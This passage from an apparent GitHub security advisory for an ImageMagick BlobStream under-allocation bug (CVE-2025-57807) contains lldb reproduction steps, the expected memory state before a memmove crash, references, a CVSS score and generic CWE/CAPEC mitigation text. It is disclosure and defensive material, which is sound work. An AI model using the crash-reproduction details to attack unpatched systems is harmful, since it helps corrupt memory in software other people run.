locals):\n(lldb) bt\n(lldb) frame select 1\n(lldb) frame var image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum\n```\n\n**Expected at second stop:** \n`type = BlobStream`\u00a0\u00b7\u00a0`offset \u2248 0x10000000`\u00a0(256 MiB) \u00b7\u00a0`length \u2248 3\u20134`\u00a0\u00b7\u00a0`extent \u2248 64 KiB`\u00a0(\u226a\u00a0`offset + length`) \u00b7\u00a0`quantum \u2248 128 KiB`\u00a0\u00b7\u00a0`mapped = MagickFalse`\u00a0\u00b7\u00a0`data + offset`\u00a0far beyond base; next\u00a0`continue`\u00a0crashes in\u00a0`_platform_memmove`.\n \n---\n\n## Credits\n\n**Reported by:**\u00a0Lumina Mescuwa\n\n---",
"id": "GHSA-23hg-53q6-hqfg",
"modified": "2025-11-03T21:34:26Z",
"published": "2025-09-05T20:09:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57807"
},
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e"
},
{
"type": "PACKAGE",
"url": "https://github.com/ImageMagick/ImageMagick"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "ImageMagick BlobStream Forward-Seek Under-Allocation"
}
Mitigation
Pre-design: Use a language or compiler that performs automatic bounds checking.
Mitigation
Use an abstraction library to abstract away risky APIs. Not a complete solution.
Mitigation MIT-10
Strategy: Environment Hardening
- Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking.
- D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail.
Mitigation MIT-11
Strategy: Environment Hardening
- Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.
- Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking.
- For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335].
Mitigation
Implement and perform bounds checking on input.
Mitigation
Strategy: Libraries or Frameworks
Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary.
Mitigation
Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth.
CAPEC-92: Forced Integer Overflow
This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.